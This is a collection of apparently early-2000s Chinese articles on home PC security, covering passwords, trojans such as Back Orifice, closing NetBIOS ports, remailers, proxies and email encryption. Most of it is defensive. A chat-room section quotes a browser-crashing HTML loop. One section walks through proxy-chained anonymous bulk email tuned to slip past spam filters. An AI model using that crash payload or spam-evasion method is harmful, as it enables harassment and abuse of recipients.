如果你的电脑可以由局域网，modem或internet连接，不速之客可以运行一个简单的程序来猜测你的密码。如果你的电脑可以由局域网，modem或internet连接，不速之客可以运行一个简单的程序来猜测你的密码。 如何解决这个问题：怎样使密码真正有用？你要选一个你不能在字典和电话本上查到的，它至少应该有八个字符长，包含大，小写字母和其他字符。一个名字或字典上的词再加上一个数字在前面或后面不是一个好的密码。

如何解决这个问题：怎样使密码真正有用？你要选一个你不能在字典和电话本上查到的，它至少应该有八个字符长，包含大，小写字母和其他字符。一个名字或字典上的词再加上一个数字在前面或后面不是一个好的密码。

3）共享文件。

如果你共享文件以便你的同事能从你的机子获得信息，你就会有漏洞呈现在互联网的不速之客面前。你知道你如何访问你同事的共享文件吗？当与互联网连接时，如果没有密码保护你的共享文件，公众以及你的对手将可以自由地访问你的那些文件。

如何解决这个问题：确保所有共享文件上都有不能被猜到的密码。说真的，打密码拖慢了你的速度。但没有了这些密码，你的文件将在互联网上变得唾手可得。

4）远程管理工具。

你是否使用一些称为“远程管理工具”的程序？我们一些吃过苦头的人一点都不喜欢它。其中，有两个“远程管理工具”是尤其肮脏的：Netbus Pro和 Back Orifice。Netbus Pro在Windows NT上运行，Back Orifice在Windows 95,98 和NT。诚然，这些工具使你容易从互联网连上你的电脑，并可以做事实上是任何的事（如果你是在控制台前的话）。他们也使入侵者更容易控制你的电脑。你让这些程序在你机上运行就像是为了让入侵者进入你的电脑。

根据我们的调查，Netbus Pro甚至能启动连在你机上的麦克风或摄像机。所以，如果你的电脑被Netbus Pro感染的话，那些在遥远的计算机前的黑客甚至可以看见你，听见你说话。

即使你根本没有安装过Netbus Pro和 Back Orifice,他们也可能在你机上运行。那就是，你没有意识到你安装了他们。他们通常隐藏在你可能安装的合法程序里。在后面你可以了解到肮脏的窥探程序是如何隐藏在你机上的。

最糟糕的是，Netbus Pro和 Back Orifice通常是隐藏的，所以你一般都不知道他们在你机上运行。反病毒和电脑安全公司不断开发出程序来除掉Netbus Pro和 Back Orifice，而Netbus Pro和 Back Orifice的作者也不断升级它们，是他们更难被删除。另外，还有许多反病毒和电脑安全公司都没听过的卑鄙程序可以使坏蛋们进入你的电脑。

如何解决这个问题：首先，也是最重要的，尽量不要安装这些程序。在今年的圣诞节，情人节，会发生什么事？你可能会收到精美生动的贺卡或屏幕保护程序。你不知道的是，在你运行这些电子邮件附件的时候，你可能已经装入了Back Orifice或其他许多类似的程序。你所不愿见到的“远程管理者”就可以对你的机子干他的肮脏事了

想找出你机上是否藏有这些恶毒的程序吗？许多杀毒软件都会检测并删除最常见的讨厌的“远程管理工具”。然而，痴狂的程序员们每天都会写出新的东西，你最好的措施是预防。不要打开电子邮件附件，除非它们来自可信的渠道，而且（这是极为重要的），你预料到你会从那里得到一份附件。像Melissa 和Explorezip等病毒可以通过侵染受害者的电子邮件系统，自动发出附有病毒的电子邮件。所以，即使是你信任的人发来的附件，也有可能含有病毒。

5）电缆调制解调器（Cable Modem）

电缆调制解调器使你的机子成为一个大型局域网的一个节点，但谁知道他的安全性使怎样的呢？如果你的机子使用Windows操作系统，点击“网上邻居”，看看你的电缆调制解调器供应商是否提供一个系统让你可以看见你的同事的电脑。

如何解决这个问题：你是否有为你的电缆调制解调器设置密码呢？近一半的用户都没有，他们的电脑向所有使用“网上邻居”的人敞开了大门。因此，你要注意密码的设置。

6）web服务器

你是否像其它数以百万计的人那样拥有自己的个人网站？你工作的地方又它自己的网站吗？在你的网站电脑上还存有别的资料吗？你的web服务器是否提供比你预计更多的服务？你可以用下面的方式测试一下。假设你的url是http://metalab.unc.edu，我们来玩一个小把戏，在导航窗口，把“http”改成“ftp”，就像ftp:// metalab.unc.edu，有时候这会给出你的网站的全图，有时候这会显示电脑里的其他东西，即使这些东西不是网站的一部分。

如何解决这个问题：如果ftp:// metalab.unc.edu发挥了作用，这意味着你的web服务器运行一个允许公众登录的文件传输协议。也许一个小孩在互联网上就能利用这个漏洞在你的网站上游玩，也许他还能干更多的事。解决这个问题的第一步是让你的网络管理员禁止匿名，第二步是在你网站上所有想保密的地方设密码。

7）到处散播的后门程序

你和很多人一起共用电脑吗？它可能已经被“特罗伊木马”感染了，就像特洛伊城的征服者躲在一个作为礼物的木马里面那样，躲在其他看来无害的程序里。“特罗伊木马”的例子是Netbus Pro和Back Orifice。大多数人都喜欢玩游戏，如果游戏有各种动人吸引之处，他们会将其从不安全的地方下载。他们还会下载那些保证他们不被黑客踢出聊天室的程序。所有这些程序都极有可能带有“特罗伊木马”，使你的电脑对网上所有的人敞开大门

更加可怕的是，这些鬼祟的程序会等到你上网，然后发消息给入侵者，告诉他们你的电脑已经门户大开，可以进来了。

如何解决这个问题：最好大家能使用独立的电脑。由于这台电脑经常要对抗一般的“特罗伊木马”，你要确认它装有防毒软件。如果你觉得电脑有问题，请来http://sky.net.cn 寻求帮助。这是国内目前提供最好的安全服务的网站，这个站点提供针对普通网民的网络安全服务。你可以考虑向该站点发送求助信件。

当把上面提到的所有电脑安全措施做好之后，你就安全了吗？我只能告诉你：你的电脑至少比以前安全了。让我们无法放心的是，如果一个极不道德的人仍然想闯入你的电脑，他还有许多其它方法（通常是复杂的和违法的）。不过，有一个简单的方法可以挡住几乎所有的电脑犯罪。如果你真的想让你机上的信息远离入侵者的黑手，就在储存和发送的时候把信息加密，使其他人都读不出来（除了你自己之外）。PGP -- Pretty Good Privacy是一个不错的安全软件，但是遗憾的是，是一个国外的优秀软件，而且需要一定的专业知识才能加以利用，在国内还没有相应的更加适合中国人使用的软件。相信不久的将来，我们能够向大家推荐一个最适合我们中国人使用的工具。

如果你做好了以上的安全措施，你就比今天99.9%的网络用户都安全了！


NetBIOS 端口的安全问题及补救方法

NetBIOS 端口的安全问题及补救方法

NetBIOS 端口是标准的、容易受攻击的网络服务端口，如果对外开放，您的电脑就会有安全问题。

1、 如何理解并关闭135端口

135端口开放实际上是一个WINNT漏洞,开放的135的端口情况容易引起自外部的"Snork"攻击！

对于135端口开放的问题，可以在你的防火墙上，增加一条规则：拒绝所有的这类进入的UDP包，目的端口是135，源端口是7，19，或者135，这样可以保护内部的系统，防止来自外部的攻击。大多数防火墙或者包过滤器已经设置了很多严格的规则，已覆盖了这条过滤规则，但任需注意：有一些NT的应用程序，它们依靠UDP135端口进行合法的通讯，而打开你135的端口与NT的RPC服务进行通讯。如果真是这样，你一定要在那些原始地址的系统上(需要135口通讯)，实施上述的规则，指定来自这些系统的通讯可以通过防火墙，或者，可以被攻击检测系统所忽略，以便维持那些应用程序的正常连接。

为了保护你的信息安全，建议你安装微软的最新NT补丁包。

2、如何理解并关闭139端口（NetBIOS提供服务的tcp端口）

Netbios（NETwork Basic Input/Output System）网络基本输入输出系统。是1983年IBM开发的一套网络标准，微软在这基础上继续开发。微软的客户机／服务器网络系统都是基于NetBIOS的。在利用Windows NT4.0 构建的网络系统中，对每一台主机的唯一标识信息是它的NetBIOS名。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址，从而实现信息通讯。在这样的网络系统内部，利用NetBIOS名实现信息通讯是非常方便、快捷的。但是在Internet上,它就和一个后门程序差不多了。因此，我们很有必要堵上这个可怕的漏洞。

对于win9x ：

在windows9x下如果你是个拨号用户。完全不需要登陆到nt局域网络环境的话。只需要在控制面板-网络-删除microsoft网络用户，使用microsoft友好登陆就可以了。但是如果你需要登陆到nt网络的话。那这一项就不能去处。因为nt网里需要使用netbios。

方法1：

1．检查NetBEUI是否出现在配置栏中。打开控制面版，双击“网络”选项，打开“网络”对话框。在“配置”标签页中检查己安装的网络组件中是否有NetBEUI。如果没有，点击列表下边的添加按钮，选中“网络协议”对话框，在制造商列表中选择微软，在网络协议列表中选择NetBEUI。点击确定，根据提示插入安装盘，安装NetBEUI。

2．回到“网络”对话框，选中“拨号网络适配器”，点击列表右下方“属性”按钮。在打开的“属性”对话框中选择“绑定”标签页，将除“TCP/IP->网络适配器”之外的其它项目前复选框中的对勾都取消！

3．回到“网络”对话框，选中“TCP/IP->拨号网络适配器”点击列表右下方“属性”按钮，不要怕弹出的警告对话框，点击“确定”。在“TCP/IP属性”对话框中选择“绑定”标签页，将列表中所有项目前复选框中的对勾都取消！点击“确定”，这时Windows会警告你“尚未选择绑定的驱动器。现在是否选择驱动器？”点击“否”。之后，系统会提示重新启动计算机，确认。

4．证实己取消绑定。重新进入“TCP/IP->拨号网络适配器”的“TCP/IP属性”对话框，选定“NetBIOS”标签页，看到“通过TCP/IP启用NetBIOS”项被清除了吧！连点两次“取消”退出“网络”对话框（不要点“确认”，免得出现什么意外）。

方法2：

运行RegEdit.exe 查找串“vnetbios”,找到后再选择“查找下一个”，将找到象“blahblah\\VxD\\VNETBIOS\\”的串，删除“VNETBIOS”项即可。 操作一定要谨慎，误操作可能导致系统崩溃，另关掉139端口后将无法共享文件和打印功能。

对于winNT ：

在windowsNT下你可以取消netbios与TCP/IP协议的绑定。控制面板-网络-Netbios接口-WINS客户（tcp/ip)-禁用。确定。重启。这样nt的计算机名和工作组名也隐藏了，不过会造成基于netbios的一些命令无法使用。如net等。

对于WIN2000 ：

选中网络邻居——）右键——）本地连接——）INTERNET协议（TCP/IP）——）属性——）高级——）选项——）TCP/IP筛选——）在“只允许”中填入除了137，138，139只外的端口。如果你在局域网中，会影响局域网的使用。

当然还有更方便的方法：选择一条防火墙规则，数据包方向选接收；对方IP地址选任何；协议TCP；本地端口139到139；对方端口0到0；选SYN标志位；动作选拦截。然后把这条规则勾上让它生效，保存即可。

最后谈谈这个后门的端口，137，138是udp端口。当通过网络邻居传输文件的时候就是通过这个2个端口.139端口是netbios提供服务的tcp端口。在windows9x下可以完全关闭这几个端口。完全禁止了netbios服务。方式是在控制面板-网络-只保留tcp/ip协议和拨号网络适配器。但是这样windows会提示你网络不完整。但是还可以继续使用。在tcp/ip协议里的netbios一项不要选择绑定到tcp/ip协议。这时候你的netbios服务完全停止了。你的机器也没有137，138和139端口了。这样追捕也搞不清你到底是9x还是unix了。windowsNT下可以封锁这些端口。封锁不必要的TCP和UDP端口可以通过在网络控制面板的IP地址对话框中进行配置来完成。 点击高级按钮激活高级IP地址对话框， 然后点击Enable Secury 对话框，然后点击配置按钮激活TCP/IP安全对话框， 那里列出了那些TCP和UDP端口被允许了。但是好像不能识别拨号网络适配器。

以上的方法都是给不需要连接入局域网的计算机的配置方法。如果你是一台拨号上网的单机那么完全可以禁止netbios服务。但是如果你需要接入局域网的话。那你只能注意加密你的共享资源了。否则全互联网的人都可以通过这个windows的“后门”到你的计算机里了。


匿名邮件转发器

  如果要实现保护重要E-mail不被人截获以及避免自己的E-mail地址被人当作袭击目标的一个重要手段，可以匿名邮件转发器。 通过匿名服务器，其实是一种匿名转信的方法，匿名转信站把你的邮件地址从邮件中抽去， 代之以一个随机的地址，再发送至目的地，这样对方收到后，根本无法知道是谁发送过来的。
remailer@replay.com、
remailer@anon.efga.org、
mixmaster@remail.obscura.com.cn
是几个匿名转发器的E-mail地址。使用时，启动Outlook，在“收件人”中输入匿名转发器的E-mail地址， 如：remailer@replay.com。信体的格式为：第一行为空行；第二行写上“：：” (两个冒号，半角，即英文标点)；在第三行写上“AnonTo：”，紧接着是收件人的E-mail地址； 第四行必须是空行；从第五行可就是正文了，正文可以随便写。注意不要把自己的签名也写进去， 否则可就让匿名服务器白忙了，若使用了E-mail软件提供的签名功能，必须将其关闭。 这样，匿名邮件转发器就会把你的邮件转发到收件人的邮件箱里了。


匿名群发邮件之实战

现在网络管理越来越严厉，为了让老百姓都变成愚民，各种信息钳制工具层出不穷，象极了一条作茧自缚的蚕，拼命的设障，阻碍视听，最后把自己封闭得动弹不得，一命呜呼。古人说过：贤明的君主，人民尊敬他；次之，人民敢于向他提意见；再次之，人民害怕他而远之，背地里骂他；最劣等的君主，人人唾弃，取笑它。谁也不愿意把一滩大便放在一个华丽宫殿的最中心、最核心吧？告诉民众：它是大便，正在污染空气，清理掉它，包括追随它的苍蝇和赏识它的恶狗！

这种环境下群发匿名邮件不容易啊，请大家和我一起做：

工具：傻瓜跳板和金锋邮件群发2.5

安装完傻瓜跳板后，按说明将里面内置的跳板IP更换为自己所掌握的跳板IP（因为内置的那个跳板是公开的，可能失效或被监控）。打开SkServerGUI.exe，点击“配置－－经过的SkSockServer” ：选中Sequ为1的那个跳板（win98版本则Sequ为0），点击“删除”，然后在IP地址栏中填上你掌握的其他代理跳板，[允许]打上钩，然后[增加]。然后再依此方法填上你掌握的其他代理跳板，如果你填上了超过1个ip地址并激活（[允许]打勾），SkSockServer可以自动把这多个激活的代理串联起来，最多可以填写255个，考虑到速度，建议有一个外部跳板就可以了。通过[上移][下移]按钮可以改变串联代理的次序。如果某个跳板失效，可以选中这个跳板然后[删除]，退出时注意要点击"配置－－保存设置"。

下面再转到SocksCap的控制窗口，点击“新建”，“浏览”找到金锋邮件群发的主程序，“确定”。它的图标就出现在SocksCap的控制窗口中了。

双击SocksCap的控制窗口中金锋邮件群发的图标，我们看到了如下界面：

关于金锋邮件群发的使用这里不做详细介绍，只对几个影响群发邮件是否成功的参数简单说明一下：SMTP服务器我采用雅虎的免费信箱，“发件箱”中填写你真实的邮箱地址；“SMTP服务器”中填写你的邮箱所使用的SMTP地址和端口（注意：雅虎的免费邮箱需要专门申请开通POP服务才可以在客户端收发信件，方法：在你的雅虎信箱中打开“选项－－POP和转 发”，选中“网上阅读邮件和 POP 功能”，点击“提交”，会出现一个页面，告诉你应该使用的POP、SMTP地址）；“发件人名字”为“匿名发信”；“回复地址”随便填或空白，但不要填写你真实的邮箱地址；“每次会话收件人数”经测验填“100”以下为好。我填80；“邮件标题”除了“无”其他几项都可以选择，这是为了避开垃圾邮件过滤程序的检查。“使用身份验证”前打勾，填写真实的邮箱用户名和登陆密码，“线程数”拨号上网的朋友填“3”以下，宽带可酌情多填。

编辑好信件内容（这种配置对带有附件的信件支持不好），导入编辑成文本格式的邮箱地址，点击“开始发送邮件”，看：

这就是匿名群发邮件的全过程。在发送过程中，最好同时在浏览器中打开一个普通网站（不要使用跳板），这叫“明修栈道，暗渡陈仓”。


个人网络安全

    个人网络安全

密码安全
    上网后大家首先就会接触到密码，我们会在许多地方用到它，你的密码尤其是上网帐户密码一旦被人窃取，后果是非常严重的！下面我就给大家讲讲怎样保护密码的安全：
    ◎. 对一些重要的密码尽量采用数字与字符相混杂的口令，多用特殊字符，诸如%、&、#、和$,而且最好不要用有意义的单词、生日和电话号码等。你必须保证你的密码不易被人猜中。
    ◎.在上网拨号程序中除非出于必要请尽量不要保存口令。因为Windows会将口令保存到以PWL为后缀的文件中，别人（尤其是有机会接近或读取你机器的人）一旦获取该文件，就可以用Pwlview这样的黑客工具获得你的帐户口令，盗用你的帐号上网！
    ◎.上网后就会知道，要求设置密码的情况有很多。提醒你一句，每个密码最好不同！（什么？你记不住？笨，拿个本记下来）因为攻击者一般在破获一个密码后，会用这个密码去尝试用户每一个需要口令的地方！想想看，别人用一个口令慢慢地盗用你的帐号上网；再去偷看与冒发你的E-mail；也许还会用你的身份去聊天室损害你的形象；去泡你常泡的MM（我真不敢想象）。
    ◎. 许多网上的商业站点要求你设置个人密码，千万不要使用与你的ISP帐户相同的密码。某些站点为了方便会把这个密码存在你的浏览器的缓存文件或者cookie中，这也就意味着任何站点都能看到你设置的密码(只要它想看），于是你的帐户密码就泄露出去了。
    ◎. 你必须经常更改口令，重要的密码在一个月内至少更改一次。因为这样即便黑客当时破译了你的密码，你也会在密码被人滥用之前将其改变。
    ◎. 最后一点关键：不要向任何人透露你的密码，特别是别人问起时。一些攻击者常常冒充你的ISP，编一些类如：由于系统更新，需要你的密码之类的谎话。千万不要上当！要知道你的ISP是不会向你问口令密码的。

后门程序
    前一段时间,上网的朋友许多都被一个叫Back Orifice的软件吓唬住了!因为听说黑客可以随意地删加你计算机中的文件、可以随意开关你的计算机。于是弄得大家网也不敢上,饭也不敢吃。（是吗？）唉……有这么严重吗？其实它就是一个基于WINDOWS的远端控制软件。类似的软件还有：Netspy（网络间谍）、Provmon等等。但是他们的工作原理都是一样的。首先把服务（Server）端程序给欲攻击方，并且执行它。攻击者自己就运行客户器（Client）端程序来控制欲攻击方。这类软件又叫“特洛伊木马程序”。原理说白了就是攻击者在知道你的IP地址后再来攻击你，所以就不是那么可怕了。防治的方法也有许多：
    1．你一旦接受到一个不明的程序，就有可能是一个后门程序。攻击者常把后门程序换一个名字用MAIL发给你，并骗说一些：“这是个好东东，你一定要试试”，“帮我测试一下程序”之类的话。你一定要注意了！下面我把常见的后门程序的大小告诉大家：Boserver（122K）、Netspy（127K）、Xspy（118K）。
    2．上网觉得不对劲时（仿佛感觉有人在遥远的地方关心你），你就按Ctrl+Alt+Del看看系统是否运行了什么其他的程序，你马上停止它。然而有些程序如Back Orifice并不显示在Ctrl+Alt+Del的进程列表中，所以如果你安装的是Win98，最好运行“附件”/“系统工具”/“系统信息”，然后双击“软件环境”，选择“正在运行任务”，赫然看见“ .EXE”，此乃BoServer(Back Orifice的服务器程序）！
找到程序后立即终止它！再看看程序从何而来。一般你可以看看WINDOWS注册表中HKEY_LOCAL_MACHING\SOFTWARE\Microsoft\Windows\CurrentVersion\下的RunService和RUN主键里查找这些程序，然后删掉它。
    3．你应该注意你常去的地方是不是把你的IP显示了出来（特别是一些聊天室），你一定要小心了！可能攻击你的人就是这样才能控制你的。因为我们拨号上网的用户IP是动态的，你每次上网的IP是服务器随机分配给你的，所以自己的IP如果不让人知道，是不会遭到袭击的。
    4．我在不久前的《电脑报》上看见一个倒霉蛋，她的计算机一直被人控制着，害得她只有偷偷上网。唉……其实她只要重装操作系统就行了。这是最简单的治疗后门程序的办法（也是最笨的）。
知道了后门程序的原理，大家可以松一口气了。大家接着往下看……

网上交流

    ◎ WEB聊天
    相信大家在网上交流的方式中最常用、最直接的就是在聊天室聊天了。与一些朋友轻松讨论问题，开开玩笑，真是舒坦！可是攻击者就利用网上的漏洞，从中作梗妨碍大家的交流。（真是可气……哇……）
现在的许多WEB聊天室支持使用HTML语句，当然这在一定程度上给了大家方便。但是攻击者完全可以利用这个让你“下课”！我列出这些聊天室的漏洞，大家一定听好了：
    1. 攻击者常常发给你（或大家！）一个足以让你死机的HTML语句。如一个死循环：<a herf=""onmousever="while(ture){window.close('/')}">。因为HTML语句是不会在聊天室显示出来的，所以你遭攻击可能还不知道！防治的办法是在你的浏览器中预先关闭你的JAVA脚本。方法是：打开WINDOWS的控制面板中的“INTERNET选项”，点击“安全”,然后选择“自定义”设置。可以看见里面有一个选项叫“脚本”/“活动脚本”,单击检查框打上勾使其“禁用”，还有一个“JAVA”选项你也把他禁用了，然后确定，OK！
    2．另外有的聊天室会把你聊天用的密码写入你的缓存里面，想想如果你不幸中了后门程序，被一个黑客的阴影笼罩，他正好去读你的缓存，你的聊天密码又正好与上网密码相同，呜呼……提醒你如果遇上这样的聊天室最好每次清理你的缓存（WINDOWS目录下的Internet Temp文件夹），删掉一些文件名含有你密码的文件，才能保证你聊天的安全问题！

    ◎ ICQ
    之所以提一下ICQ，是因为它太不保险了！虽然它的确方便了网友的联系，可是它会把你最重要的IP地址泄露出去。（哈哈，我仿佛听见你在笑我猪头了。）是的，ICQ是可以在系统里关掉显示IP（打开ICQ选择menu/security & privacy，在“security”选项页选中“don't allow others to see my IP adress”）。可是你知道不？网上有一种工具只要你在网上，输入你的ICQ号，就可以知道你的IP地址（哈哈，知道厉害了吧，让我来笑你吧）。解决办法只有你上网后，把ICQ状态设置为隐身（在任务栏的ICQ图标上点右键选status/privacy （invisible)）。这样攻击者才不知道你在网上！或者就干脆不要用ICQ了（哎哟，谁丢的西红柿？）……

E-mail
    电子邮件大概是网上用得最广也是最令人放心不下的了。它太不安全、太不可靠也太脆弱了！我们最后才讲它是因为它同时又太重要了！好吧，这里就向你提供一个全面的邮件安全与邮箱保护方案。

    ◎.安全邮件与数字签名
    由于越来越多的人通过电子邮件进行重要的商务活动和发送机密信息，而且随着互联网的飞速发展，这类应用会更加频繁。因此保证邮件的真实性（即不被他人伪造）和不被其他人截取和偷阅也变得日趋重要。因为我们知道：用许多黑客软件如Email Bomber能够很容易地发送假地址邮件和匿名邮件，另外即使是正确地址发来的邮件在传递途中也很容易被别人截取并阅读。这些对于重要信件来说是难以容忍的。下面我们就以Outlook Express为例介绍发送安全邮件和加密邮件的具体方法。
    在Outlook Express中可以通过数字签名来证明你的邮件的身份，即让对方确信该邮件是由你的机器（注意：是机器！）发送的。Outlook Express同时提供邮件加密功能使得你的邮件只有预定的接收者才能接收并阅读它们，但前提是你必须先获得对方的数字标识（不懂？下面慢慢解释给你听）。
    要对邮件进行数字签名必须首先获得一个私人的数字标识（Digital ID,你的数字身份证）。所谓数字标识是指由独立的授权机构发放的证明你在Internet上身份的证件，是你在因特网上的身份证。这些发证的商业机构将发放给你这个身份证并不断效验其有效性。你首先向这些公司申请数字标识，然后就可以利用这个数字标识对你写的邮件进行数字签名。如果你获得了别人的数字标识那么你还可以跟他发送加密邮件。下面我们简单阐述一下数字标识的工作原理。
    数字标识由“公用密钥”、“私人密钥”和“数字签名”三部分组成。你通过对发送的邮件进行数字签名可以把你的数字标识发送给他人，这时他们收到的实际上是公用密钥，以后他们就可以通过这个公用密钥对发给你的邮件进行加密，你再在Outlook Express中使用私人密钥对加密邮件进行解密和阅读。 数字标识的数字签名部分是你的电子身份卡，数字签名可使收件人确信邮件是您发送的，并且未被伪造或篡改。
说了这么多，下面具体来介绍一下数字标识的申请和使用。
    1、 数字标识的申请
    既然数字标识有这么大的作用（如果你是大老板的话），那么不掏点银子是不太现实的（每年才9.95美元），不过我们可以先申请一个免费的数字标识感受一下。
    目前Internet上有较多的数字标识商业发证机构，其中VeriSign 公司是 Microsoft 的首选数字标识提供商。通过 VeriSign 的特别馈赠，Microsoft Internet Explorer 4.0 用户均可获得一个免费使用60天的数字标识。下面就以该公司为例介绍申请方法：最简单的方法就是在Outlook Express中选择“工具”/“选项”/“安全”，点击“获取数字标识”，这时将自动拨号并连接到Outlook Express申请数字标识的页面，点击“Verisign”即可。也可以直接进入VeriSign公司的申请页面http://www.verisign.com/client/index.html，选择右边黄底上的第一项“TRY IT”，在后一页面选择”Class 1 Digital ID”即可。
    申请时将要求你添一张表，按提示填入您的个人信息及电子邮件地址，填表时有一项叫“Challenge Phrase”，它直译叫做“盘问短语”，是当你想取消数字标识时Verisign公司确认你是否是合法拥有者的询问口令。如果你不能正确答出这个短语你的数字标识将一直使用到期满为止，注意该口令不能包含标点。还有一项“Payment Information”是针对收费用户的，如果你在前面选的是“I'd like a free 60-day trial Digital ID”即先试用60天，则此项不填。
    确认无误并提交后，过一会儿您就会收到一封Verisign公司发来的电子邮件，其中就包含您的数字标识PIN。一般情况下你只需简单地按最后那个“NEXT”按钮就可以继续了，不过有时可能会提示上一页面错误（笔者就曾遇到），建议您直接将回信末尾提供的PIN记下来然后到https://digitalid.verisign.com/ getidoutlook.htm去继续下一步。这时你只需在要求输入Digital ID PIN的框内输入你收到的PIN然后点击“Retrieve button”即可。如果一切顺利的话，这时将开始安装你的数字标识到本机的Outlook Express中，你的申请也大功告成了！

    2、 对邮件进行数字签名
    获得数字标识以后，就可以通过Outlook Express很容易地对您所发送的电子邮件进行数字签名。如果你希望对所有待发的邮件都进行数字签名，请选择“工具”/“选项”，选择“安全”选项页，在“在所有待发邮件中添加数字签名”检查框前面打上钩选中即可。如果你只希望对某一封邮件进行数字签名的话，只需在撰写邮件时将“数字签名邮件”按钮（）按下即可。当你对邮件数字签名以后该邮件将出现签名图标（），你的数字签名可以使别人确认邮件确实是从你这儿发出去的，并且可以保证邮件在传送过程中不会被改变。但是假如预定的接收者的电子邮件收发软件不支持S/MIME协议，他仍然可以阅读数字签名的邮件，这时你的数字签名只是简单地作为一个附件附在邮件的后面。

    3、对电子邮件加密
    对电子邮件加密可以使之在传递途中不被别人截取并阅读，因为只有具有私人秘匙的用户才能正确地打开加密邮件，非法用户看到的只是编码以后的数字和字母，即使你也只能在Outlook Express中正确读出。你的私人秘匙在安装数字标识时装到了你的Outlook Express中的，因此你（也只有你）能正常阅读该邮件。Outlook Express会根据私人秘匙自动解秘邮件。需要说明的是：别人要给你发加密邮件必须先获得你的公用秘匙，因为Outlook Express需要利用你的公用秘匙来对发给你的邮件进行加密运算，最后你收到时会自动由你的私人秘匙对邮件解秘。由于你的签名邮件的数字标识里就包含了你的公用秘匙，所以别人获得你的公用秘匙的方法是简单地将数字标识保存到地址簿中。方法如下：(1) 打开签名邮件； (2) 从“文件”菜单中选择“属性”； (3) 单击“安全”一栏； (4) 单击“加入地址簿”按钮。OK！
    现在你大概应该明白了吧？你如果想向对方发送加密邮件，对方必须申请有数字标识而且必须先由对方发封签名邮件给你，你再将他的数字标识保存到地址簿中，以后你就可以向他发加密邮件了。Outlook会自动检查地址簿中是否有收件人的数字标识，如果没有，是不允许你发送加密邮件的！
    如果你希望对所有待发的邮件都进行加密，请选择“工具”/“选项”，选择“安全”，在“对所有待发邮件的内容和附件进行加密”检查框前面打上钩选中即可。如果你只希望对某一封邮件进行加密的话，只需在撰写邮件时将“加密邮件”按钮（）按下即可。邮件加密后将出现加密图标（）

    ◎. E-Mail炸弹与邮箱保护
    E-MAIL炸弹并非空穴来风，越来越多的人受到这种或成功或失败的“信骚扰”。对于E-MAIL炸弹治疗，《新潮电子》第10期有重点介绍，大家自己去看吧。关于E-Mail炸弹的彻底预防现在还没有一个真正全面有效的方法，下面推荐一种比较可行的方法，就是利用转信服务。
    目前比较流行的转信服务在一定程度上能够解决特大邮件攻击的问题。如果你去申请一个转信信箱（如www.126.net），利用转信站提供的过滤功能，可以将那些不愿看到的邮件统统过滤删除在邮件服务器中，或者将那些广告垃圾邮件转移到别处，最坏的情况无非是抛弃这个被人盯上的免费E-mail。具体方法（以126信箱为例）是在进入126转信信箱后选择“过滤邮件”在“新建过滤器框”内设置好你不愿看到的邮件的相关信息，然后在“则转到”里面填写你准备用来牺牲的免费信箱即可。如果你想拒绝接收特大邮件或某个特定地址的邮件，则在“拒收邮件”中设置。

    ◎. 邮件附件
    大家都知道利用E-MAIL可以发送一些小型的程序软件。正是如此，一些人利用它给你发一个带有烈性病毒附件的MAIL让你的计算机翘辫子或者发一些后门程序给你，时时刻刻在看着你的网上动静。（真让人害怕呀……）所以你就要严密的把好关：看好每一个附件！看看发信人是否可靠。收到附件先不要急着去执行，要拿出你的杀毒软件从容的杀N遍。要方方面面都确定安全才可以用。


代理猎手的妙用

    我们以前好不容易得到的proxy,动不动就给封了,即使没有封,也常常不近如意,辛辛苦苦地再去找来,可人家用的好用,在你这儿就不一定快了,不得已我编了个批处理,把所有找到的PROXY全部PING一遍(即在DOS窗口下PING XXX.XXX.XXX.XXX),找到最快的一个,但proxy去地球村但去TW就不行了,用的人多了,又给封了,真是!@#$%代理猎手的出现,使我们通往世界的路大大拓宽了,他不单单是简单的搜索proxy,最有用的就是它的Verify功能.简述如下:

1.首先我们在它的setting中修改一下:
Verify Url:www.nease.net
Key word:欢迎你来到网易
Key word可以选择该页的title中的内容
当然你可以选择一个国内更快的网址,目的是可以迅速的验证,漏网的可能性会小些

2.先搜索8080,3128,80等口找到所有的proxy.删除没用的地址

3.如果你想去地球村(www.geocities.com)在setting中填入如下内容,然后点击Verify all按钮重新验证,选个速度最快的,你就得到了去www.geocities.com的最快的proxy,如果你要去TW orHK 方法相同
Verify Url:www.geocities.com (你要去的地址)
Key word:GeoCities - The (该地址的关键字可以选择该页的title中的内容)
设置对话框主要设置搜索和验证的参数，描述如下：
Connection time out - 连接的超时时间(秒)，如果在这个时间内没连接上主机，则放弃对该主机的连接。
Parallel connections - 并发连接数，即同时进行的连接和验证的最大个数，显然是越大搜索越快，但Win95-98下能够同时进行的网络连接有限，如果此值太大，则
会影响其它网络应用程序的正常运行。
Verify time out - 验证的超时时间(秒)，包括连接所用时间在内的验证时间如果超过此时间还没有得出验证结论，则超时并放弃验证。
Verify URL - 验证所用的网络资源的地址，一般是个你熟悉的页面地址。
Key words - 验证所用的特征字符串，注意一定要是源文件中的字符串而不一定是页面显示出来的字符串。
Auto use proxy at port - 是否使用自动调度proxy的功能，以及本程序作为中间级proxy所服务的端口号。在浏览器中将proxy设置为本机的IP地址和这个端口号就可以使用自动调度功能了。


代理服务器的基本概念和一些相关技巧

作者：刺

我们知道，代理分为免费的和收费的，最近我们学校就搞了个收费的代理，unix系统，速度还真是快！不过我没钱啊~~用不了，哼！总有一天我要黑了它！~~~
好了，现在我们来讲讲免费代理。
代理按功能不同来分可以分为http代理，ftp代理，telnet代理，socks代理等。
我们先来讲讲代理的好处，首先，用代理可以掩护自己，使自己的IP受到保护，比如，你用了
代理服务器去浏览网站时，服务器记录的就不是你的真实IP，而是代理的IP
这中间的好处就不用我说了吧，做坏事的人心里有数，呵呵。
当然，对于一些网速不快的朋友来说用代理可以提高网速，还可以访问一些被严禁访问的站点：）
下面我们就来说说代理的原理，比如说你是A机，B是代理服务器，C是你要访问的主机
但是你连C机连不上，但是你连B的速度很快，B连C的速度也很快
所以你就可以先连到B，再由B连到C。
这样，我们也可以了解到路由器是怎样封锁我们的访问的，比如路由器禁止了C的连接，
但没禁止我们对B的连接，所以我们可以通过B访问C！

好了，罗嗦了这么多，大家对代理服务器的概念有了吧？
下面我们开始正题，正如前面所讲的，在互联网上有很多地方提供免费的代理服务器，
但要记住，免费的代理只是暂时的，没有哪个白痴会把自己的机子一直设成免费的代理来和大家
一起用！！！所以，一定要珍惜代理！
那么，我们在哪里可以找到这些代理呢？其实网上有很多无聊的人会不停的给你找代理
然后，再把代理贴出来。我们要怎么找到这些列表呢？
我在这里推荐google！！！
伟大的google（www.google.com）
有史以来最好的搜索引擎！
